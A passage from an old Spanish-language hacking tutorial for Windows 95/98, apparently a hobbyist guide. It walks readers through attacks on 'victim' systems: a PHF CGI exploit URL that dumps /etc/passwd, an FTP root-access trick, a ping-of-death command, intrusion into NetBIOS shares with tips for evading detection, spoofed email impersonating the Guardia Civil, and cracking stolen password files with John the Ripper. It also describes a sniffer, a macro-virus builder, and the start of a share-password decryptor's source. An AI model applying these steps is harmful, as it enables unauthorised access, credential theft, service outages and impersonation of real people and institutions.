-
- Supongo que a estas alturas sabras lo que es el FTP, File Transfer Protocol
- o sea Protocolo de Transferencia de Ficheros y como podras observar en el
- listado de los puertos al FTP le corresponde el 21. Este servicio hay que
- conocerlo muy bien ya que ademas que nos sirve para subir o bajar ficheros
- tambien nos puede ayuda en nuestros propositos :), por supuesto el hacking.
-
- Sino dispones de ningun cliente FTP, el propio win95/98 lleva incorporado
- uno, el unico problema es que no es muy vistoso ya que funciona en modo
- MS-DOS pero es muy versatil y perfecto para nosotros. Para ejecutarlo basta
- que activemos una ventana MS-DOS y en la linea de comados escribamos FTP y
- se pondra en modo FTP. Un ejemplo seria esto:
-
- c:\>ftp <- Escribimos FTP.
-
- ftp> <- activado el modo FTP.
-
- Si no sabes manejarlo, escribiendo un "?" o "help" saldran todos los
- comandos disponibles del FTP, como no viene a cuento no los explicare pero
- buscando por hay podras hallar informacion de lo que hace cada cosa pero
- lo mejor es que lo averigues tu solito.
-
- 3-3. Telnet.
-
- Por suerte los usuarios de win95/98 con el telnet tienen mas suerte o menos
- segun se mire, ya que el servico de Telnet de win95/98 que tambien esta
- incorporado en el sistema, es muy facil de manejar y ademas tiene ventana
- propia. Por eso si ejecutamos telnet se abrira una ventana y lo unico que
- tenemos que hacer es ir al menu en la opcion "conectar" y dentro de aqui
- la de "sistema remoto", entonces se activara otra ventana en la que
- nos saldra tres opciones, la primera "nombre de host" es donde queremos
- conectar, "puerto" a que puerto conectamos, por defecto el 23 y por ultimo
- tenemos "tipo de terminal" que no hace falta cambiarlo.
-
- El telnet es importante ya que es asi como entramos a una cuenta en un
- servidor y podremos hacer lo que tengamos permitido en el sistema.
- Logicamente entraremos en una cuenta si tenemos el login y password.
-
- 4. Hacking Basico En Windows.
-
- Por fin ya se a acabo el latazo de la explicacion de como moverse por
- win95/98. Ahora ya podemos empezar a jugar un poco por inet :), siempre
- por puro placer pero jamas con malos fines.
-
- En esta seccion os explicare varias maneras de hacking usando el win95/98 a
- pelo o sea sin utilizar ninguna herramienta externa.
-
- 4-1. Phf.
-
- La primera tecnica ya es muy conocida y la verdad es que tendremos suerte
- si nos funciona pero todavia sigue vigente y doy fe de ello }:-) solo hay
- que saber buscar y tener paciencia.
-
- Para que esto nos funcione solo tenemos que tener un navegador instalado
- en nuesto win95/98, por defecto suele venir el IE o sea que no podras decir
- que no tienes, siempre y cuando hallas instalado los paquetes extras.
-
- Lo que tenemos que hacer es ir con nuestro navegador a algun servidor que
- corra sobre unix (muchos). Conectamos con un servidor en cuestion,
- www.victima.com, ya estamos viendo su web, llegados aqui, a esa linea le
- añadimos:
-
- http://www.victima.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
-
- Como ya he dicho si todo sale bien nos aparecera el fichero de passwords
- del servidor con lo que solo nos queda grabarlo en nuestro HD. Por supuesto
- el PHF tiene muchas variantes por eso te aconsejo que busce algo que
- profundice en esta tecnica al igual que tambien busca informacion sobre
- el fichero passwd de unix para comprenderlo.
-
- 4-2. Ftp.
-
- Antes ya te he explicado el funcionamiento del FTP de win95/98, ahora lo
- usaremos para sacer el fichero de password de un servidor. Desde una
- ventana del MS-DOS llamamos al programa FTP y escribimos:
-
- ftp> open victima.com
- Conect to victima.com
- 220 victim.com FTP server ready.
-
- ftp> quote user ftp
- 331 Guest login ok, send ident as password.
-
- ftp> quote cwd ~root
- 530 Please login with USER and PASS.
-
- ftp> quote pass ftp
- 230 Guest login ok, access restrictions apply.
-
- ftp> dir (o lo que querramos)
-
- Y como siempre es el caso si todo sale bien estaremos metidos en el
- sistema como root (en lenguaje unix significa el superusuario, o sea el
- que controla el servidor). Por desgracia esta tecnica es muy antigua por
- lo que mas seguro no funcionara pero todo es posible.
-
- 4-3. Ping De La Muerte.
-
- Esta tecnica no es propia de un Hacker sino de un Lamer (no quiero decir
- Cracker para no ofender a nadie :) ya que unicamente sirve para tirar un
- servidor o sea que se desconecta de Internet y esto puede representar
- grandes perdidas a una empresa. Con esto solo os quiero decir que aunque
- aqui os lo explicare no es cuestion que lo useis por Internet atacando
- servidores.
-
- La utilidad Ping sirve principalmente para saber si un servidor esta activo
- y ademas podemos calcular el trafico en la red segun el tiempo de su
- respuesta. Basicamente se le envia un paquete a un servidor y este nos
- contesta, solo que si se le envia un paquete muy grande puede llegar
- desordenado, por lo que el servidor pide al origen que le vuelva a enviar
- una parte o la totalidad del paquete, por lo que se produce un datagrama
- del ping muy grande y producira su caida. Para ejecutar este ataque solo
- tenemos que escribir :
-
- c:\>ping -l 65510 victima.com
-
- Pues esta simple linea es muy destructiva, por lo que tened cuidado y antes
- de hacer tonterias leed la parte sobre seguridad de la guia.
-
- 4-4. Recursos Compartidos.
-
- Como win95/98 NO tiene seguridad nos permite colarnos en el disco duro de
- otra persona por Internet y lo mejor del caso es que esta tecnica nos la
- proporciona los propios programas del win95/98. Por supuesto no todo es tan
- sencillo ya que hay que cumplir unos requisitos. Esto se debe a una mala
- configuracion del propio usuario al no configurar adecuadamente los
- recursos compartidos de su red corriendo sobre win95/98.
-
- Para colarnos en el HD de otro ordenador debenos tener nuestro ordenador
- bien configurado, o sea el compartir recursos bien puesto y tambien tener
- el Netbios instalado. Para configurarlo, tenemos que tener activado la
- opcion de "compartir ficheros e impresoras" en MIPC->Panel de Control->Red.
- SI por el caso la opcion esta desactivada simplemente pulsamos el boton de
- "añadir" y añadimos el servicio "Compartir ficheros e impresoras en redes
- Microsoft". En la misma ventana, debemos tener el "Primer inicio de sesion"
- en "Cliente para redes Microsoft". Tambien tiene que estar activado el
- "Cliente para redes Microsoft", que viene por defecto en MIPC->Acceso
- Telefonico a Redes->Conexion a Inet que usaremos->boton derecho->
- propiedades, debiendo estar activada la casilla "conectarse a la red".
-
- Ahora ya podemos ponernos manos a la obra, entonces volvemos a una
- ventana del MS-DOS y ejecutamos:
-
- c:\>nbtstat -A (IP DE LA VICTIMA)
-
- NetBIOS Remote Machine Name Table
-
- Name Type Status
- ---------------------------------------------
- VICTIMAMACHINE <00> UNIQUE Registered
- VICTIMAGROUP <00> GROUP Registered
- VICTIMAMACHINE <03> UNIQUE Registered
- VICTIMAMACHINE <20> UNIQUE Registered
- VICTIMAGROUP <1E> GROUP Registered
-
- MAC Address = 44-45-53-54-00-00
-
- Cuando ejecutamos este comando nos saldra una tabla como esta y el
- primer 'UNIQUE' de tipo <00> es el nombre de la victima y como puedes
- ver la maquina se llama VICTIMAMACHINE.
-
- Entonces ahora creamos/editamos el archivo LMHOSTS, si por el caso
- encontrais uno que pone LMHOSTS.SAM no lo toqueis, poniendo la direccion IP
- y el nombre de la maquina en cuestion, esto seria de la siguiente forma:
-
- c:\>edit c:\windows\system32\LMHOSTS
-
- VICTIMAMACHINE
-
- Entonces cerramos el fichero y desde un ventana del MS-DOS ejecutamos
- un comando para añadir el ordenador de la victima a nuestro Netbios y
- esto seria de la siguiente forma:
-
- c:\>NBTSTAT -R
-
- Ahora nos interesa saber que recursos comparte la victima y esto tampoco
- nos traera complicacion alguna:
-
- c:\>net view \\VICTIMAMACHINE
-
- Shared resources at \\VICTIMAMACHINE
-
- Sharename Type Comment
- -----------------------------------------
- BANCO Disk
-
- Y como podemos observar comparte una carpeta llamada BANCO.
-
- Ahora ya podemos operar como si fuese una terminal mas en nuestra red local
- sobre win95/98. Ya solo nos queda ejecutar el comando que querramos, si por
- ejemplo queremos ver el contenido, solo tenemos que escribir:
-
- c:\> dir \\VICTIMAMACHINE\BANCO
-
- O para leer cualquier fichero de la carpeta:
-
- c:\> type \\VICTIMAMACHINE\BANCO\CUENTABANCARIA.TXT
-
- Si queremos conectar al recurso compartido de forma grafica (o sea con
- una ventana y no seguir usando el MS-DOS), solo tenemos que pulsar
- INICIO->BUSCAR PC y dentremos el PC remoto pero esto solo es posible
- si hemos añadido la VICTIMAMACHINE a una unidad de red a la que podamos
- llamar, deberemos ejecutar:
-
- c:\>NET USE e: \\MIPC\WINDOWS
-
- Esta tecnica solo funciona si la maquina remota ejecuta win95/98 o win 3.11
- y ademas comparte las carpetas sin contraseña en modo "Acceso a nivel
- compartido" MIPC->Panel de control->Red | Control de acceso. Si utilizase
- el "Acceso a nivel de usuario" nuestro grupo debe estar autorizado en
- esa maquina. Podemos probar a intentar insertar el grupo de nuestra maquina
- para que este autorizada, esto lo conseguiremos con el Regedit, por
- desgracia los sistemas win95/98 y OSR2 que estan ejecutando el Servidor Web
- Personal de Microsoft desactivan esta posibilidad de acceso remoto tras
- informar de la conveniencia de hacerlo al usuario, ya que el servidor web
- obliga a compartir carpetas aun sin tener red local.
-
- Logicamente un usuario que haya tenido el despiste de conectarse a Internet
- con carpetas compartidas no toma luego medidas de control sobre quien
- entra en su maquina. Pero no hay que hacer ilusiones ya que podemos ser
- pillados si por ejemplo un usuario ejecuta el programa Netwatch, que
- muestra los usuarios conectados a nuestra computadora en cada momento y por
- supuesto el nombre de las computadoras por lo que es aconsejable cambiar el
- nombre de nuestra computadora usando el Regedit. Si nuestra maquina se
- llama HACKERNOBO cambiamos todas la cadenas donde aperezca este nombre con
- el Regedit a un nombre menos sospechoso.
-
- Si no conectamos la VICTIMAMACHINE como una unidad mas a nuestra
- computadora no nos tendremos que preocupar del Netwatch, asi conseguiremos
- una cierta seguridad personal ya que lo mas seguro, la VICTIMAMACHINE no se
- dara cuenta de nuestra entrada. Tambien hay que decir que si la
- VICTIMAMACHINE quiere apagar su computadora le saldra el mensaje del tipo
- "hay otros usuarios conectados a su ordenador, si apaga se desconectaran"
- si ocurre esto seremos pillados.
-
- Decir que el comando Net, dispone de muchos parametros que nos puede ser
- utiles y ademas podemos jugar durante mucho tiempo con ellos :) los cuales
- son los siguientes:
-
- c:\>net /?
-
- For more information about a specific Microsoft NET
- command, type the command name followed by /?
- (for example, NET VIEW /?).
-
- NET CONFIG Displays your current workgroup settings.
- NET DIAG Runs the Microsoft Network Diagnostics program to
- display diagnostic information about your network.
- NET HELP Provides information about commands and
- error messages.
- NET INIT Loads protocol and network-adapter drivers without
- binding them to Protocol Manager.
- NET LOGOFF Breaks the connection between your computer and
- the shared resources to which it is connected.
- NET LOGON Identifies you as a member of a workgroup.
- NET PASSWORD Changes your logon password.
- NET PRINT Displays information about print queues
- and controls print jobs.
- NET START Starts services.
- NET STOP Stops services.
- NET TIME Displays the time on or synchronizes your computer's
- clock with the clock on a Microsoft Windows for
- Workgroups, Windows NT, Windows 95, or NetWare time server.
- NET USE Connects to or disconnects from a shared
- resource or displays information about
- connections.
- NET VER Displays the type and version number of the
- workgroup redirector you are using.
- NET VIEW Displays a list of computers that share
- resources or a list of shared resources
- on a specific computer.
- The command was completed successfully.
-
- Pues aqui teneis todos los parametros disponibles del comando Net, por lo
- que solo nos queda jugar un rato para saber que es cada cosa. No es
- divertido si os lo explico todo.
-
- 4-5. Fake Mail Con El Telnet.
-
- Esta tecnica nos ayuda a suplantar la direccion de correo electronica que
- querramos :). La verdad es que tiene pocos usos, en mi opinion debido a
- una serie de razones pero siempre puede servir para gastar una buena
- broma enviando aun amigo un mail del director de la Universidad diciendo
- que ha sido expulsado por pirata }:-) y no te cuento si es un mail de la
- Guardia Civil.
-
- La verdad es que es muy sencillo de hacer pero por supuesto habra que tomar
- unas ciertas medidas de seguridad, que ya explicare luego. Lo primero
- que tenemos que hacer es ejecutar el cliente Telnet (sobre el manejo del
- Telnet ya lo explique mas arriba) y donde pone "puerto" en vez de poner
- el puerto 23 pondremos el 25 que corresponde al puerto del mail y esperamos
- a que nos conectemos a ese puerto, cuando conectemos nos saldra un
- mensaje y esta esperando a que pulsemoa alguna tecla:
-
- 220 Howdy From mail.airmail.net running Smail 3.1.30.16 (ESMTP)
- [d/o/u/g] ready at Thu, 10 Oct 96 00:03:17 -500 (CDT)
-
- Muchas veces lo que podemos hacer es escribir "help" y saldran todos los
- comandos, tambien podemos escribir "echo" y la maquina nos contestara que
- esta lista. Para escribir un mail hay que seguir una serie de pasos:
-
- mail from:gc.uco@mad.servicom.es <- ponemos de donde viene.
-
- El servidor nos contesta:
-
- 250 <gc.uco@mad.servicom.es> ... Sender Okay
-
- Ahora escribimos:
-
- rcpt to:nob_ody@xxxxxxxx.com <- a quien se lo enviamos.
-
- El servidor nos contesta:
-
- 250 <nob_ody@xxxxxxxx.com> ... Recipiant Okay
-
- Ahora escribimos:
-
- data
-
- El servidor nos contesta:
-
- 354 Enter mail, end with "." on a line by itself
-
- Ahora escribimos:
-
- To: nob_ody@xxxxxxxx.com
- From: gc.uco@mad.servicom.es
- Subject: Te querremos!!
- Bueno nobody, solo te queremos decir que nos gusta tu trabajo y te
- querremos fichar para el departamento.
- Direccion General de
- la Guardia Civil
- . <- para terminar el mail.
-
- El servidor nos contesta:
-
- 250 Mail accepted
-
- Ahora escribimos:
-
- quit <- ya esta todo listo :)
-
- Pues ves como es realmente simple!! Pero antes de empezar a jugar con
- esta tecnica tenemos que asegurarnos que el servidor de mail no regrista
- nuestro IP, esto lo podremos averiguar si enviamos un mail de prueba a
- alguna cuenta anomima que tengamos. Si vemos que en la cabecera del mail
- sale nuestro IP ese servidor no sirve. Hay listas disponibles por Internet
- sobre servidores que permiten hacer esto.
-
- 4-6. Cambiando El Entorno.
-
- Esta tecnica no es que sea propia del hacking ya que solo sirve para
- cambiar la pantalla de inicio o la de finalizar windows. Los logos de
- windows tienen un formato BMP 320X400 pero estan clamuflados en ficheros
- con extension SYS pero siguen siendo realmente BMP'S.
-
- El logo del principio de windows (ya sabes el de las nubes) lo podeis
- encontrar como:
-
- c:\>logo.sys
-
- Si no encuentras este fichero, entonces lo que tenemos que hacer es crearlo
- y grabarlo alli mismo y cuando windows vuelva a reiniciar usara nuestro
- grafico y si lo volvemos a quitar, usara el de siempre. El logo del final
- (cuando cierra windows) esta en el directorio windows y lo podemos
- encontrar como:
-
- c:\windows>logos.sys
-
- Logicamente es obligatorio que los graficos que querramos sustituir
- tengan de tamaño 320x400 y sean ficheros BMP'S. Conviene que les pongamos
- el atributo de ocultos, que esto se hace con el comando Attrib, por
- ejemplo:
-
- c:\windows>attrib +h logos.sys <- lo oculta.
-
- c:\windows>attrib -h logos.sys <- lo hace visible.
-
- 4-7. Finger.
-
- La utilidad Finger, muy usada en Unix, en realidad no esta disponible en
- Win95/98 pero como somos Hackers nosotros si que somos capaces desde
- Win95/98. Finger se utiliza para obtener informacion de un servidor. Puede
- parecer una tonteria pero es util, por ejemplo, podemos empezar a sacar los
- Login's de los usuarios y empezar a adivinar sus passwords, tambien podemos
- vigilar al root del servidor (cada cuanto tiempo conecta, cuando fue la
- ultima vez que estuvo, etc...) y asi muchas cosas.
-
- La verdad es que para usar el Finger usaremos cualquier navegador, IE o
- Netscape. Simplemete nos dirigimos a un url un poco especial, es un web
- que permite hacer Finger a cualquier host y nos deveulve los resultados.
- Esto se conoce como "Finger Gateway". El url del web es:
-
- http://www.hgp.med.umich.edu/cgi-bin/finger
-
- 4-8. Whois.
-
- La utilidad Whois, al igual que Finger es muy comun en Unix y no esta
- disponible en Win95/98 pero comos somos asi de listos saldremos del apuro.
- Tambien sirve para pedir informacion de un servidor pero no el igual que
- Finger, ya que se diferencian en el tipo de informacion, el finger se suele
- utilizar mucho para buscar direcciones de correo mientras que el Whois,
- para averiguar informacion sobre un servidor en concreto.
-
- Para usar esta utilidad, ejecutamos el Telnet y nos dirigimos a un
- host muy especial:
-
- c:\>telnet whois.internic.net
-
- Por supuesto Internic, una empresa privada norte ameriacana que se
- encarga de controlar los dominios de Internet, y podemos usar su base
- de datos para pedir informacion sobre un servidor.
-
- Cuando conectemos a la base de datos de Internic, escribimos "Whois nombre_
- del_servidor" y nos sacara la informacion.
-
- telnet InterNIC > whois aol.com
- Connecting to the rs Database . . . . . .
- Connected to the rs Database
- America Online (AOL-DOM)
- 12100 Sunrise Valley Drive
- Reston, Virginia 22091
- USA
-
- Domain Name: AOL.COM
-
- Administrative Contact:
- O'Donnell, David B (DBO3) PMDAtropos@AOL.COM
- 703/453-4255 (FAX) 703/453-4102
- Technical Contact, Zone Contact:
- America Online (AOL-NOC) trouble@aol.net
- 703-453-5862
- Billing Contact:
- Barrett, Joe (JB4302) BarrettJG@AOL.COM
- 703-453-4160 (FAX) 703-453-4001
-
- Record last updated on 13-Mar-97.
- Record created on 22-Jun-95.
-
- Domain servers in listed order:
-
- DNS-01.AOL.COM 152.163.199.42
- DNS-02.AOL.COM 152.163.199.56
- DNS-AOL.ANS.NET 198.83.210.28
-
- Como vemos hemos pedido informacion sobre AOL.COM, American On-Line. Y esto
- es lo que nos ha sacado Internic. Al final podemos ver los dominios
- asociados a AOL. Pues sencillo y muy util, el whois.
-
- 4-9. Tracert.
-
- Esta utilidad que si esta implementada en Win95/98, nos sirve para calcular
- el tiempo que tarda un paquete de un servidor hasta otro y ademas podemos
- saber por cuantos servidores pasa. Muy util para sacar posibles servidores
- victimas si nos llaman la atencion.
-
- Para usar esta utilidad, abrimos una ventana MS-DOS y escribimos Tracert,
- a secas y nos sacara el menu de opciones disponible.
-
- c:\>tracert
-
- Usage:tracert [-d] [-h maximum_hops] [-j host-list] [-w timeout] target_name
-
- Options:
- -d Do not resolve addresses to hostnames.
- -h maximum_hops Maximum number of hops to search for target.
- -j host-list Loose source route along host-list.
- -w timeout Wait timeout milliseconds for each reply.
-
- Pues como veis, no tiene ningun misterio las opciones del Tracert, por
- lo que ya aprendereis su uso con la experiencia. Ahora escribimos una
- direccion IP cuando invocamos al Tracert, de la siguente forma:
-
- c:\>tracert 198.83.210.28
-
- Tracing route to dns-aol.ans.net [198.83.210.28]
- over a maximum of 30 hops:
-
- 1 * * * Request timed out.
- 2 138 ms 145 ms 135 ms 204.134.78.201
- 3 212 ms 191 ms 181 ms glory-cyberport.nm.westnet.net [204.134.78.33]
- 4 166 ms 228 ms 189 ms enss365.nm.org [129.121.1.3]
- 5 148 ms 138 ms 177 ms h4-0.cnss116.Albuquerque.t3.ans.net [192.103.74.45]
- 6 284 ms 296 ms 178 ms f2.t112-0.Albuquerque.t3.ans.net [140.222.112.221]
- 7 298 ms 279 ms 277 ms h14.t64-0.Houston.t3.ans.net [140.223.65.9]
- 8 238 ms 234 ms 263 ms h14.t104-0.Atlanta.t3.ans.net [140.223.65.18]
- 9 301 ms 257 ms 250 ms dns-aol.ans.net [198.83.210.28]
-
- Trace complete.
-
- Aqui podeis por todos lo sitios que ha pasado el paquete que hemos enviado
- al IP 198.83.210.28. Y asi podemos con todos los servidores de Internet.
-
- 4-10. Winipcfg.
-
- Ejecutando este comando, nos saldra una ventana windows informandonos de
- los diferentes valores de nuestra red. Realmente util para verificar la
- configuracion.
-
- 4-11. Ipconfig.
-
- Este programa es similar al anterior descrito pero funciona en modo MS-DOS.
- Al igual nos sirve para verificar la configuracion de nuestra red. Por
- ejemplo, lo ejecutamos asi:
-
- C:\WINDOWS>ipconfig
-
- Windows 98 IP Configuration
-
- 0 Ethernet adapter :
-
- IP Address. . . . . . . . . : 0.0.0.0
- Subnet Mask . . . . . . . . : 0.0.0.0
- Default Gateway . . . . . . :
-
- Decir que en el ordenador donde estoy escribiendo este articulo, no lo
- tengo en estos momentos en red, por eso no lo tengo configurado. Para pedir
- las diferentes opciones, ejecutamos:
-
- C:\WINDOWS>ipconfig -h
- Windows 98 IP Configuration
- Command line options:
- /All - Display detailed information.
- /Batch [file] - Write to file or ./WINIPCFG.OUT
- /renew_all - Renew all adapters.
- /release_all - Release all adapters.
- /renew N - Renew adapter N.
- /release N - Release adapter N.
-
- No veo la necesidad de traducir esto debido a que es realmente facil, en
- caso de no entender nada, aprende ingles :) Pero la que mas nos puede
- interesar es la opcion /All.
-
- 4-12. Arp.
-
- Ejecutamos este comando para que nos muestre o para modificar nuestra IP
- en nuestra red, mantenida por un servidor Windows NT. Por ejemplo:
-
- C:\WINDOWS>arp
-
- Displays and modifies the IP-to-Physical address translation tables used by
- address resolution protocol (ARP).
-
- ARP -s inet_addr eth_addr [if_addr]
- ARP -d inet_addr [if_addr]
- ARP -a [inet_addr] [-N if_addr]
-
- -a Displays current ARP entries by interrogating the current
- protocol data. If inet_addr is specified, the IP and Physical
- addresses for only the specified computer are displayed. If
- more than one network interface uses ARP, entries for each ARP
- table are displayed.
- -g Same as -a.
- inet_addr Specifies an internet address.
- -N if_addr Displays the ARP entries for the network interface specified
- by if_addr.
- -d Deletes the host specified by inet_addr.
- -s Adds the host and associates the Internet address inet_addr
- with the Physical address eth_addr. The Physical address is
- given as 6 hexadecimal bytes separated by hyphens. The entry
- is permanent.
- eth_addr Specifies a physical address.
- if_addr If present, this specifies the Internet address of the
- interface whose address translation table should be modified.
- If not present, the first applicable interface will be used.
- Example:
- > arp -s 157.55.85.212 00-aa-00-62-c6-09 .... Adds a static entry.
- > arp -a .... Displays the arp table.
-
- Y como viene siendo habitual, os remito a aprender ingles y a jugar con las
- distintos parametros que tiene este comando.
-
- 4-13. Route.
-
- Este comando nos permitira manejar la tabla local TCP/IP. Al igual que los
- demas comandos dispone de varios parametros, los cuales son los siguientes:
-
- C:\WINDOWS>route
-
- Manipulates network routing tables.
-
- ROUTE [-f] [command [destination] [MASK netmask] [gateway] [METRIC metric]]
-
- -f Clears the routing tables of all gateway entries. If this is
- used in conjunction with one of the commands, the tables are
- cleared prior to running the command.
-
- command Must be one of four:
- PRINT Prints a route
- ADD Adds a route
- DELETE Deletes a route
- CHANGE Modifies an existing route
-
- destination Specifies the destination host.
-
- MASK Specifies that the next parameter is the 'netmask' value.
-
- netmask Specifies a subnet mask value to be associated
- with this route entry. If not specified, it defaults to
- 255.255.255.255.
-
- gateway Specifies gateway.
-
- METRIC Specifies that the next paramenter 'metric' is the
- cost for this destination
-
- All symbolic names used for destination are looked up in the network
- database file NETWORKS. The symbolic names for gateway are looked up in the
- host name database file HOSTS.
-
- If the command is PRINT or DELETE, wildcards may be used for the destination
- and gateway, or the gateway argument may be omitted.
- Diagnostic Notes:
- Invalid MASK generates an error, that is when (DEST & MASK) != DEST.
- Example> route ADD 157.0.0.0 MASK 155.0.0.0 157.55.80.1
- The route addition failed: 87
-
- Examples:
-
- > route PRINT
- > route ADD 157.0.0.0 MASK 255.0.0.0 157.55.80.1 METRIC 3
- ^destination ^mask ^gateway ^metric
- > route PRINT
- > route DELETE 157.0.0.0
- > route PRINT
-
- Creo que queda bastante claro, incluso provee distintos ejemplos para
- familiarizarnos con este comando.
-
- 4-14. Netstat.
-
- Este comando nos puede ser muy util para saber que conexiones tenemos
- activas en el momento de ejecutar este comando, para conexiones TCP/IP, lo
- ejecutamos asi, solo que en mi caso no saldra ya que no estoy conectado en
- este momento:
-
- C:\WINDOWS>netstat
-
- Active Connections
-
- Proto Local Address Foreign Address State
-
- Como veis no sale nada, pero si lo ejecutais cuando esteis conectados, ya
- vereis :) Como siempre este comando dispone de varios parametros, que son
- los siguientes:
-
- C:\WINDOWS>netstat /?
-
- Displays protocol statistics and current TCP/IP network connections.
-
- NETSTAT [-a] [-e] [-n] [-s] [-p proto] [-r] [interval]
-
- -a Displays all connections and listening ports.
- -e Displays Ethernet statistics. This may be combined with the -s
- option.
- -n Displays addresses and port numbers in numerical form.
- -p proto Shows connections for the protocol specified by proto; proto
- may be TCP or UDP. If used with the -s option to display
- per-protocol statistics, proto may be TCP, UDP, or IP.
- -r Displays the routing table.
- -s Displays per-protocol statistics. By default, statistics are
- shown for TCP, UDP and IP; the -p option may be used to
- specify a subset of the default.
- interval Redisplays selected statistics, pausing interval seconds
- between each display. Press CTRL+C to stop redisplaying
- statistics. If omitted, netstat will print the current
- configuration information once.
-
- Ya solo nos queda jugar con los distintos parametros y aprender :)
-
- 5. Utilizacion De Tools.
-
- En esta seccion os explicare diferentes tools que podeis usar para hacking,
- por supuesto hay que buscarlas por Internet, no pondre el url para
- encontrarlas, ya que a lo mejor cuando estas leyendo esta guia ya no existe,
- pero os dire como se llama el programa asi lo podras buscar ademas esto
- tambien te servira para que te espabiles y sepas buscar cosas por Internet.
-
- Logicamente esta guia es para win95/98 y los programas que explicare seran
- para win95/98 pero tambien me veo obligado a explicar varias tools que no
- son de win95/98 propiamente sino de MS-DOS pero que son necesarias y ademas
- corren en modo MS-DOS de win95/98.
-
- 5-1. Skamwerks lab version 1.1b
-
- Este programa es un util herramienta que nos ayuda a crear de forma rapida
- virus macro, o sea para el Word. Tiene que estar instalado el Word para
- que este programa nos funcione.
-
- Al ejecutar el programa nos aparecera una ventana con 2 botones los caules
- son las 2 opciones que podemos escoger "Virii Wizard" o "Advanced Users".
- El "virii Wizard" es la opcion, si no sabemos muy bien como crear un virus
- de macro ya que nos moveremos por varios menus y crearemos un virus de
- forma rapida y facilmente. La otra opcion, "Advanced Users" es para
- aquellos que sepan de Word Basic, el lenguaje de programacion del Word, ya
- que podemos meter codigo Word basic directamente y asi crear un virus a
- nuestro gusto.
-
- Como este no es un curso sobre virus, no me voy a enrollar sobre la
- utilizacion exacta del programa. En mi opinion es un buen programa,
- en ingles :) programado en C++.
-
- 5-2. WaReZ! Version 95.12.31
-
- Este programa es un cliente FTP que muestra los directorios ocultos en un
- servidor, util si nos metemos en algun sitio sospechoso. Como ya es
- costumbre para que nos funcione tenemos que tener instalado el WINSOCK.DLL
- correctamente.
-
- Al igual que antes tampoco hay que explicar mucho sobre este programa ya
- que su Interface es igual que el cliente WS_FTP que suele ser muy familiar
- para todos, por lo que no encontraremos mucha dificultad en su manejo.
-
- 5-3. John the ripper v1.4.
-
- Esta magnifica tool no es propiamente de win95/98 pero seria un pecado no
- hablar de ella, cuando corre sobre win95/98 de maravilla (bueno, dentro de
- lo que cabe :). John, como se le conoce, sirve para crackear un fichero
- unix de password (el conocido etc/passwd, como ya digo aprended algo de
- unix).
-
- Cuando robemos un fichero passwd de un servidor, lo que tenemos que hacer
- es usar el John para sacar cuentas, pero no solo basta esto sino tambien
- necesitamos un buen diccionario y una combinacion de suerte y paciencia.
-
- Supongamos que ya tenemos todo (fichero passwd, John y un diccionario),
- entonces tenemos que abrir una ventana MS-DOS y llamar al John, si lo
- llamamos sin nigun parametro nos saldran un listado de opciones, esto seria
- asi:
-
- c:\>john
-
- Usage: john [flags] [passwd files]
- Flags:-pwfile:<file>[,..] specify passwd file(s)
- -wordfile:<file> -stdin wordlist mode, read words from <file> or stdin
- -rules enable rules for wordlist mode
- -incremental[:<mode>] incremental mode [using john.ini entry <mode>]
- -single single crack mode
- -external:<mode> external mode, using john.ini entry <mode>
- -restore[:<file>] restore session [from <file>]
- -makechars:<file> make a charset, <file> will be overwritten
- -show show cracked passwords
- -test perform a benchmark
- -users:<login|uid>[,..] crack this (these) user(s) only
- -shells:[!]<shell>[,..] crack users with this (these) shell(s) only
- -salts:[!]<count> crack salts with at least <count> accounts only
- -lamesalts assume plaintext passwords were used as salts
- -timeout:<time> abort session after a period of <time> minutes
- -list list each word
- -beep -quiet beep or don't beep when a password is found
- -noname -nohash don't use memory for login names or hash tables
- -des -md5 force DES or MD5 mode
-
- Veis? :), y como siempre no explicare que es cada opcion os lo dejo para
- que jugueis vosotros solitos!. Ahora, ya podemos crackear el fichero,
- para ello escogermos la opcion "single", ya que el john no nos pedira
- un fichero de diccionario, si fuese el caso que no tenemos, ponemos:
-
- c:\>john -single passwd
-
- Y el John se pondra a trabajar, cuando halla acabo creara un fichero
- llamado "John.pot" donde se almacenaran los passwords encriptados con
- su correspodiente passwords desencriptado (esta definicion no es del
- todo correcta pero es para que lo entendais) y ya tenemos unas cuentas
- de acceso al servidor.
-
- Este metodo va bien para la primera pasado con el John pero luego conviene
- usar un diccionario y con el diccionario seria de la siguiente manera:
-
- c:\>john -wordfile:spain.txt passwd
-
- El John seguiria el mismo proceso antes descrito, por supuesto si el
- fichero "John.pot" esta creado ya, les añadira los resultados obtenidos
- a este fichero, por cierto este fichero tiene atributo de solo lectura.
-
- Pues aqui se acaba la explicacion del John, que seguro que ya aprendereis
- a manejar correctamente. Referente a los diccionarios hay varias
- herramientas que corren bajo MS-DOS que crean diccionarios o tambien
- podeis buscar por Internet ya que hay varios web's llenos de diccionarios.
-
- Decir que la ultima version del John The Ripper es la 1.5.
-
- 5-4. Gobbler v 2.1.
-
- Volvemos a la carga con otro programa que no es del win95/98 propiamente,
- pero es un sniffer que podemos usar bajo win95 en una red Ethernet. Un
- Sniffer para aquellos que no sepan, es un programa que captura los paquetes
- que pasan por una red y asi se pueden conseguir logins, passowrds u otro
- tipo de informacion que querramos, logicamente si los paquetes estan
- encriptados, esto dificultara el proceso, ya que habra que desencriptarlos
- si se puede.
-
- Como siempre abrimos una ventana y ejecutamos el programa de la siguiente
- manera:
-
- c:\>gobbler
-
- Y se activara el programa y veremos una serie de ventanas, en este punto,
- pulsamos el <ESC> y saldra una ventana con un menu. Ahora tenemos que
- configurar el programa para nuestra red, la verdad es que es muy sencillo
- de utilizar, con un poco de practica dominaremos este sniffer facilmente.
- Como sugerencia conviene leer el fichero de documentacion que trae, ya
- que explica como configurar el programa.
-
- 5-5. Sharepasswd.
-
- Este programa desencripta el passorwd de win95/98. Esta en lenguaje C, como
- supongo todo el mundo tiene que tener un compilador en C y si no ya estas
- buscando uno, que hay muchos y gratis por Internet. No veo la necesidad
- de explicaros el programa ya que tambien incluyo la explicacion del
- autor la cual esta muy bien, logicamente.
-
- ------------ Codigo Fuente ---------------------------------------------------
-
- /* This program takes an 'encrypted' Windows 95 share password and decrypts it
- * Look at:
- * HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Network\LanMan
- * to find a machine's shares. Within the data for each share are two
- * registry entries, Parm1enc and Parm2enc. Parm1enc is the "Full access"
- * password. Parm2enc is the "Read only" password.
- *
- * David Ross 2/9/96
- * snakey@cs.umd.edu
- *
- * Do not distribute this program for any commercial purpose without first
- * contacting me for permission.
- *
